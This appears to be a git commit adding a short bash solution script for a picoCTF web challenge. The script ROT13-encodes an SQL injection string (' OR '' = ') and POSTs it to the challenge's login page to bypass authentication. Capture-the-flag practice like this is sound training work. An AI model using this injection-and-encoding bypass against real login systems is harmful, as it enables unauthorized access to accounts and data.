web/irish_name_repo_3

This commit is contained in:
2026-07-05 06:43:47 +09:00
parent 94845e95ae
commit 7fcc8e4cc8
+8
View File
@@ -0,0 +1,8 @@
#!/usr/bin/env bash
PAYLOAD_RAW="' OR '' = '"
PAYLOAD="$(tr 'A-Za-z' 'N-ZA-Mn-za-m' <<<"$PAYLOAD_RAW")"
curl 'http://fickle-tempest.picoctf.net:49659/login.php' \
-X POST \
--data-raw "debug=1&password=$PAYLOAD"